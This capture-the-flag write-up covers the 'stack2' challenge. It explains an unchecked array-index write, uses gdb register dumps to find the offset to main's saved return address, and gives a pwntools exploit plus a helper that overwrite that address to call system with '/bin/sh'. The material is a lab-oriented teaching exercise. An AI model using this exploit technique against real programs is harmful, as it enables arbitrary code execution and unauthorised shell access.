Out-of-bounds array write: finding the offset with gdb

Filling in a gap =-= writing down how to find the array offset.

攻防世界 stack2

The decompiled code below has an out-of-bounds array write: the index v5 comes straight from scanf and is never checked.

```c
puts("which number to change:");
__isoc99_scanf("%d", &v5);          /* index: no bounds check */
puts("new number:");
__isoc99_scanf("%d", &v7);          /* value */
v13[v5] = v7;                       /* v13 is a byte array: only the low byte of v7 is stored */
```

The boxed part of figure 1 above is the array assignment. The value is stored as a single byte from cl (the low byte of v7), and eax clearly holds the destination address, which is the array base when the index entered is 0.

To redirect execution into a function we need the distance from the array base to main's saved return address (the value popped by ret).

So the first breakpoint goes on `mov [eax], cl`,

and the second on main's `ret`.

Result

At the first breakpoint, eax is the array base:

```
EAX  0xffffcf88 ◂— 0xe0
EBX  0x0
ECX  0xff
EDX  0xffffcf88 ◂— 0xe0
EDI  0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
ESI  0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
EBP  0xffffcff8 ◂— 0x0
ESP  0xffffcf50 —▸ 0xf7ffda74 —▸ 0xf7fd3470 —▸ 0xf7ffd918 ◂— 0x0
EIP  0x80486d5 (main+261) ◂— mov byte ptr [eax], cl
```

At the second breakpoint esp, the stack pointer, points at the saved return address that `ret` is about to pop:

```
*EAX  0x0
 EBX  0x0
*ECX  0xffffd010 ◂— 0x1
*EDX  0xf7fb987c (_IO_stdfile_0_lock) ◂— 0x0
 EDI  0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 ESI  0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
*EBP  0x0
*ESP  0xffffd00c —▸ 0xf7e1d647 (__libc_start_main+247) ◂— add esp, 0x10
*EIP  0x80488f2 (main+802) ◂— ret
```

Subtract the address held in eax from the address of the return slot (esp at ret):

```python
hex(0xffffd00c - 0xffffcf88)   # '0x84'
```

So index 0x84 of the array is the first byte of main's saved return address.

Because the server environment is broken (there is no .so to work with afterwards), we use system + "/bin/sh" instead.

exp

```python
from pwn import *
#context.log_level = 'debug'

r = process("./stack2")

# Create a one-element array so the "change" menu item is reachable.
r.recvuntil("How many numbers you have:\n")
r.sendline("1")
r.recvuntil("Give me your numbers\n")
r.sendline("1")

def change(addr, num):
    # Menu item 3: v13[addr] = num. addr is unchecked, and only the low
    # byte of num is stored (mov byte ptr [eax], cl), so the return
    # address is written one byte at a time.
    r.recvuntil("5. exit\n")
    r.sendline("3")
    r.recvuntil("which number to change:\n")
    r.sendline(str(addr))
    r.recvuntil("new number:\n")
    r.sendline(str(num))

# Index 0x84 is main's saved return address (see the gdb offset above).
# Overwrite it, little-endian, with 0x08048450.
change(0x84, 0x50)
change(0x85, 0x84)
change(0x86, 0x04)
change(0x87, 0x08)
# 0x88..0x8b is left alone: it serves as the return address of the
# function we return into. 0x8c..0x8f is its first argument: 0x08048987.
change(0x8c, 0x87)
change(0x8d, 0x89)
change(0x8e, 0x04)
change(0x8f, 0x08)

# Menu item 5: exit. main returns into the overwritten address.
r.sendline("5")

r.interactive()
```
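The exp above hand-writes eight change() calls. As an added example (not part of the original writeup), the helper below derives those (index, byte) pairs from the measured offset and the fake frame layout, and checks them against a constructed model of the stack that stores only the low byte of each value, as `mov byte ptr [eax], cl` does. The two addresses, 0x08048450 and 0x08048987, are simply the values the exp writes; the 0x100-byte stack model and the function names are assumptions made for the example.

```python
import struct

# Measured in gdb: eax at `mov [eax], cl` (array base) and esp at main's `ret`
# (saved return address). The difference is the index of the return slot.
ARRAY_BASE = 0xffffcf88
RET_SLOT = 0xffffd00c
RET_OFFSET = RET_SLOT - ARRAY_BASE  # 0x84


def fake_frame_writes(ret_offset, call_target, argument, dummy_ret=None):
    """Return (index, byte) pairs that overwrite main's saved return address
    with call_target and place `argument` where a 32-bit cdecl callee expects
    its first argument.

    Layout relative to the array base:
        ret_offset + 0 : call_target  (popped by main's ret)
        ret_offset + 4 : dummy_ret    (the callee's own return address)
        ret_offset + 8 : argument     (the callee's first argument)
    dummy_ret=None leaves those four bytes untouched, as the exp does.
    """
    frame = [(0, call_target), (8, argument)]
    if dummy_ret is not None:
        frame.append((4, dummy_ret))
    writes = []
    for rel, value in frame:
        # Little-endian, one byte per change() call.
        for i, b in enumerate(struct.pack("<I", value)):
            writes.append((ret_offset + rel + i, b))
    return writes


def apply_writes(stack_size, writes):
    """Model v13[index] = value on a constructed stack of stack_size bytes.
    Only the low byte of the %d-parsed value survives the byte store."""
    stack = bytearray(stack_size)
    for idx, value in writes:
        if not 0 <= idx < stack_size:
            raise IndexError("index %#x outside the modeled stack" % idx)
        stack[idx] = value & 0xFF
    return stack


def dword_at(stack, offset):
    """Read a little-endian 32-bit value from the modeled stack."""
    return struct.unpack_from("<I", stack, offset)[0]


def exp_writes():
    """The exact writes the exp performs: target 0x08048450, argument 0x08048987."""
    return fake_frame_writes(RET_OFFSET, 0x08048450, 0x08048987)


if __name__ == "__main__":
    for idx, b in exp_writes():
        print("change(%#x, %#x)" % (idx, b))
    stack = apply_writes(0x100, exp_writes())
    print("ret slot  -> %#x" % dword_at(stack, RET_OFFSET))
    print("argument  -> %#x" % dword_at(stack, RET_OFFSET + 8))
```

Running it prints the same eight change() lines as the exp, and the modeled stack shows 0x08048450 in the return slot and 0x08048987 two dwords above it, with the dword in between left at zero. Passing a `dummy_ret` fills that middle slot too, which is what you would do if a clean return from the callee mattered.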